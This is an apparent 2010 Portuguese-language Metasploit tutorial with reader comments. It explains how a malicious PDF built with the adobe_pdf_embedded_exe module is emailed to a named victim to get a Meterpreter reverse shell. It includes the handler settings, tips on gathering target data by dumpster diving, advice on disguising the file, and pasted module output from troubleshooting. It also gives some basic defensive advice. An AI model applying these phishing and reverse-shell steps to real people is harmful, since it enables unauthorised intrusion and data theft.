Todos sabem que quase diariamente surgem novas vulnerabilidades nos aplicativos desenvolvidos pela Adobe Systems. Adobe Reader! Quem não tem ou nunca usou alguma vez ou ainda usa? Vamos falar sobre o exploit adode_pdf_emdedded_exe, presente no Metasploit.
Agora vamos enviar o nosso arquivo planilha2.pdf para nosso alvo/vítima. Mas antes vamos deixar o msf escutando com o exploit multi/handler, veja a configuração na imagem abaixo:
Usamos o exploit multi/handler, selecionamos nosso payload (windows/meterpreter/reverse_tcp), especificamos nosso host local (LHOST 192.168.0.110), especificamos nossa porta que ficará escutando (LPORT 4455) e por fim, executamos com o comando exploit.
Ok, já enviamos um e-mail para nosso alvo e junto anexamos nosso arquivo planilha2.pdf. Reparem que o usuário Ciclano já recebeu o nosso e-mail.
Mas como você sabe o nome da pessoa? Você é mágico? Claro que não né pessoal, existe toda uma garimpagem de dados antes de chegarmos a esta etapa, por exemplo, dumpster diving ou trashing, que é a atividade na qual o lixo é vasculhado em busca de informações sobre o alvo, isso passa uma boa visão panorâmica do trabalho realizado na empresa!
Ah, mas claro, o usuário Ciclano é precavido, ele antes de executar o arquivo irá baixá-lo para sua máquina e escaneá-lo para verificar possíveis vírus.
O usuário Ciclano se contenta que não foi emitido nenhum alarme de vírus presente no arquivo e agora sim irá lê-lo.
Executado o arquivo .pdf, agora veja que ganhamos uma conexão meterpreter com o alvo!
Ok! Pessoal, é um ataque simples, mas que pode fornecer bons frutos.
Obs.: Cuidado com a forma que irá utilizar este artigo, recomendo para fins de conhecimento, que seja realizado apenas em ambientes virtuais ou redes que você tenha o direito de testar ou esteja autorizado.
Vocês podem utilizar o seguinte ambiente para testes pessoal:
Caso não possua 2 máquinas, poderá utilizar apenas uma com máquinas virtuais!
ATENÇÃO: Administradores e/ou responsáveis por redes corporativas de pequeno, médio e até mesmo grande porte, de nada adianta ter os melhores firewalls, os melhores antivírus etc (se é que existe o melhor!) se não houver uma conscientização dos seus colaboradores. Como viram, com um simples clique todas essas tecnologias empregadas irão por água a baixo, isso quando não existe uma plano adequado. Querem começar a entender os conceitos e as possíveis medidas preventivas que poderão, a princípio, por em prática? Dêem uma olhada na ISO NBR 27002, lhes ajudará bastante.
Se ocorrer tudo certo até aqui, você pode continuar, na sequência, com outro artigo que escrevi sobre pós-exploração. Segue o link:
[4] Comentário enviado por eldermarco em 27/02/2010 - 12:14h
Interessante, muito interessante. No entanto, tenho críticas a seu artigo.
Parece que você apenas apresenta como explorar uma falha, mas não apresenta uma forma de evitá-la ou pelo menos contornar o problema. Acho que artigos desse gênero são importantes, mas devem vir junto com alguma solução para que qualquer leitor que caia nele saiba como proceder ou onde procurar para evitar situações como essa (e não fale para ir procurar no Google...).
Não adianta muito saber que meu PC está vulnerável e não conhecer nada para resolver isso, não? Aponte links, escreva, não sei, mas apresente algo e não apenas assuste o coitado. =)
[5] Comentário enviado por roberto_espreto em 27/02/2010 - 13:42h
@zelongatto
Muito obrigado.
Abraços.
@eldermarco,
Você está coberto de razão, por falta de atenção, vamos assim dizer, acabei deixando de lado a segurança do usuário final e não especifiquei uma "possível" medida de segurança!
Em minhas consultorias sempre me tratei com administradores, analistas, etc, experientes da área, então não era preciso eu dizer as formas de se proteger de determinadas vulns, como está por exemplo!
Já está anotado sua crítica positiva, e com certeza nos próximos artigos especificarei ainda mais. Obrigado.
Mais então!
1º Eu já considero quem utiliza o VOL, um usuário beeeeeem mais experiente que o usuário MOMY (Msn, Orkut, Mediaplayer e Youtube), e que ficará um tanto quanto esperto ao receber pdfs que o mesmo não lembra ter solicitado.
2º O exploit não é novo, eu costumo dizer que metade do seu código explora o fator humano: Curiosidade! O intuito era mais a demonstração do mesmo.
3º Na versão atual do Adobe Reader, já apresenta avisos de arquivo malicioso, e as vezes nem mesmo deixa abrí-lo! Portanto, segue as mesmas regras/conselhos de sempre, mantenha o adobe atualizado, utilize o windows update sempre que possível, mantenha a base de dados do seu AV atualizado, e assim como em arquivos exe, cab, etc, que o usuário já aprendeu a não clicar, também passe a executar o mesmo procedimento com arquivos pdf, doc, jpeg, dentre outros!
4º Ao ser executado o pdf malicioso, será criado um novo processo na máquina windows, para verificar basta abrir o "Gerenciador de tarefas" e ir na aba "Processos", agora basta matar o processo, se você demorar para realizar este procedimento pode ser que dê tempo para o atacante migrar de processo e instalar algum tipo de backdoor, ai já complica um pouco mais para um usuário comum saber achar isso! Geralmente, isso é, na maioria das vezes, é criado uma chave no registro do windows para o backdoor iniciar no boot da máquina! Para ver o que está sendo inicializado na máquina basta digitar "msconfig" no executar e ir na aba "Inicializar", pode-se ainda visualizar a chave de registro, que fica localizada em HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e excluir o que estiver suspeito, mais tomem cuidado! :P Já avisando que isto é o básico a se fazer, pois existem backdoor/virus/malware/etc, mais sofisticados.
5º Como falei um pouco acima, nós, usuários do linux, não precisamos se preocupar com a maioria das vulnerabilidades existentes para o windows! Este exploit por exemplo!
Está tendo uma discussão (No bom sentido) legal no fórum do BackTrack Brasil (www.backtrack.com.br), onde sou moderador, dê uma olhadinha para mais dúvidas!
Aproveitando para fazer um marketing, se quiserem tirar mais dúvidas a respeito do Metasploit, peço que entre e participem da comunidade Metasploit, aqui mesmo do VOL, segue o link:
[6] Comentário enviado por zelongatto em 27/02/2010 - 22:26h
@eldermarco, na verdade a correção dessa falha estaria no usuario em nao executar o arquivo, a grande maioria das falhas de segurança é o usuario, mesmo sendo um bom administrador de redes etc, se nao conhecer engenharia social e saber pensar como um atacante pensaria nao adianta, sempre estaremos vulneraveis mesmo usando um sistema "seguro"..
o segredo do hacking alem de obrigatoriamente conhecer as tecnicas e ferramentas esta em saber manipular o usuario/administrador usando persuação e engenharia social..
enfim
[8] Comentário enviado por stremer em 28/02/2010 - 18:49h
Amigo,
Seu artigo esta ótimo para explicar sobre BT/MetaExploit/etc etc...
Porém esse exploit é tosco demais...
tentei reproduzir aqui:
Maquina vitima, windows xp 2002 (sem nenhum service pack) + Adobe reader 8
1) Ao enviar via hotmail (maior parte dos usuarios) já acusa como virus.
2) Ao enviar por outro método o IE 6 abre o arquivo mas o proprio adobe 8 acusa que pode ser malicioso
3) Se mesmo assim o usuário continuar, o arquivo não abre (my documents parece que o exploit é feito para windows em ingles)
4) Após diversas tentativas não consegui carregar o pdf com o exploit de jeito nenhum no windows em portugues (continuo tentando)...
[9] Comentário enviado por roberto_espreto em 28/02/2010 - 19:44h
@stremer
Obrigado por comentar!
Concordo com você, mais em partes, não concordo que o exploit seja "tosco", basta saber utilizá-lo corretamente. Realmente ele não é novo,isso sim, até já citei isso em um comentário meu acima.
Resp. 1 - Eu utilizei o GMAIL para o envio, não o HOTMAIL, por todas as empresas que "EU" já passei, o mais utilizado é o GMAIL, salvo as exceções!
Resp. 2 - Sim, ele vai mostrar mensagem de arquivo suspeito, se você reparar eu coloquei algo escrito no e-mail enviado para a "vítima", está na 2ª parte do artigo, na 2ª imagem!
Resp. 3 - Meu ambiente testado foi justamente este que apresentei no artigo, Windows XP SP3 Português, com Adobe Reader 9.1, e não, definitivamente NÃO, apesar de estar escrito na info do exploit ser para WIndows XP English, ele funciona para várias outras versões de idiomas.
Resp. 4 - Ok, quando você escreveu (continuo tentando), curti ler isso, porque a maioria, já no primeiro erro desiste e lasca "pedra". Valeu, mais vamos lá! Aparecerá determinados avisos de conteúdo malicioso, repare atráves do gerenciador de tarefas, em Processos, se foi realmente não foi criado o novo processo, pode ser que algo esteja interferindo para criar a conexão reversa com o multi/handler!
Qual o cenário ao certo que você está utilizando para os testes? Pois dependendo, posso te aconselhar a usar outro tipo de técnica para "camuflar" este pdf ou mesmo usar outro payload para a criação do arquivo FILENAME.
[11] Comentário enviado por L!N5X em 28/02/2010 - 23:01h
Kra mto bom seu artigo e as críticas do pessoal, pois, é assim que ganhamos mais conhecimentos, compartilhando informações grandiosas como esta, que até então, só pessoas como vc, com conhecimento elevado para explorar tal vulnerabilidade.
Vou Aproveitar seu bom humor e espero que continue sempre assim, para solicitar uma ajuda, pois, executei da maneira que explicou mas não funfou.
Ambiente utilizado:
Máq. Virtual utilizando o vmware.
1º Máq. (ubuntu 9.10)
Instalei o msf conforme instruções colhidas na net executei todos os procedimentos até a parte da escuta.
2º Máq. (Windows XP SP2)
Copiei o arquivo gerado para o windows e quando executo, ele informa que o pode ser vírus e talz peço para continuar só que não funciona. A escuta não roda. Pode me ajudar por favor.
[13] Comentário enviado por roberto_espreto em 02/03/2010 - 20:52h
@P1R4T3
Valeu velho!
Mais acho que não vou te ajudar não!
Hahhaha, brincadeira!
Deixa eu ver se entendi, você tem apenas um máquina real certo e dentro da mesma uma virtual, certo?
No vmware está rodando o que? Windows ou Ubuntu? Ou ambos são máquinas virtuais?
Tente executar o exploit com o windows SP3. Qual a versão do Adober Reader presente na máquina?
Lembrando que o exploit funciona apenas com o Adobe Reader, não funcionará com o foxit, free eXPert pdf, PDF-X change viewer, sumatra, entre outros...
Se possivel recomendo utilizar a distro BackTrack! Antes que me digam que não é pra influenciar em nada a utilização das mais variadas distros, eu testei apenas com o backtrack, por várias vezes, por isto recomendo-a! :p
@mordecai
Valeu, cara! Hehehe esse termo eu inventei quando estudei uns semestres no IBTA, era só pra rir está época!
Abraços!
[14] Comentário enviado por stremer em 03/03/2010 - 12:42h
ok amigo... metasploit... :P
então não sou nenhum especialista em segurança... sou desenvolvedor mas conheço os principios para não cometer erro nos sistemas que trabalho ou simplesmente mexo...
usei o BackTrack... consigo fazer normalmente o reverse-tcp com outros exploits... mas nesse caso não rolou não...
acho que o problema deve ser que não afeta todas as versões do adobe 8, devo estar com uma versão com alguma correção ou coisa assim... pois tentei baixar meia duzia de adobe 8 e não consegui com nenhum... vou tentar com o adobe 9... pois outros exploits o reverse funciona na boa.... por isso digo que é algo com esse do adobe mesmo...
em relação a gmail/hotmail... concordo que o gmail é mais usado profissionalmente mas para pessoas comuns (pcs caseiro) ainda acho que o hotmail é mais.
[15] Comentário enviado por roberto_espreto em 03/03/2010 - 13:08h
@stremer
Me desculpe se expressei mal, jamais tive a intenção de questionar seus conhecimentos, realmente peço perdão se em algum momento eu passei isso!
Isso, pode ser incompatilidade com algo relacionado a versão do mesmo! Não cheguei a realizar testes com as versões 8.x, apenas com as versões 9.x mesmo, em especial a 9.1.0!
Assim que passar este próximo final de semana, vou postar aqui nos comentários um "adendo" referente ao uso desde exploit já citado, usarei algumas opções diferentes e avançadas.
Vamos fazer esse "trem" funcionar! Hehehehe! Abração amigo!
[16] Comentário enviado por dilojunior em 12/03/2010 - 15:38h
Parabéns pelo artigo 3spreto!
Vamos lá, eu estou em um ambiente em que tenho o BT4 em uma VM e o Windows XP SP2 sem atualização, AV nada em outra.
Segui os passos para setar as variaveis, já refiz os passos várias vezes, e está dando o seguinte erro
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME pdfmal.pdf no The output filename.
INFILENAME /root/teste.pdf yes The Input PDF filename.
OUTPUTPATH /root/ no The location to output the file.
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.2 yes The local address
LPORT 4455 yes The local port
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x (Windows XP SP3 English)
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started reverse handler on 192.168.0.2:4455
[*] Reading in '/root/teste.pdf'...
[*] Parsing '/root/teste.pdf'...
[*] Parsing Successful.
[-] Exploit failed: undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.
Alguma idéia do que possa ser esse erro "Exploit failed: undefined method `[]' for nil:NilClass" ?
Tentei googlar mas não retornou nada interessante só alguns bugs parecidos que já haviam sido arrumados.
[17] Comentário enviado por neriberto em 11/08/2010 - 11:53h
Muito bom o artigo, estou voltando a estudar com mais afinidade, fiz alguns testes em um window server 2003 standard com sp2 e português...bem explorando a ms08-067 diretamente eu não consegui acesso a este servidor, porém usando deste artificio de pdf funciona perfeitamente.
Problemas que eu tive, meu Adobe Reader é a versão 9.0.0 ele pede confirmação, e salvando o novo arquivo em pdf ele nao ta executando corretamente...achei estranho, depois algumas tentativas salvei em .exe e executei manualmente...consegui o acesso, talvez eu tenha errado em algum ponto enfim.
[19] Comentário enviado por anonymouskalilin em 12/07/2015 - 00:02h
Boa noite, alguem pode me ajudar sobre este devido erro na hora que dou exploit?
*] Exploit running as background job.
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit aborted due to failure: no-target: No matching target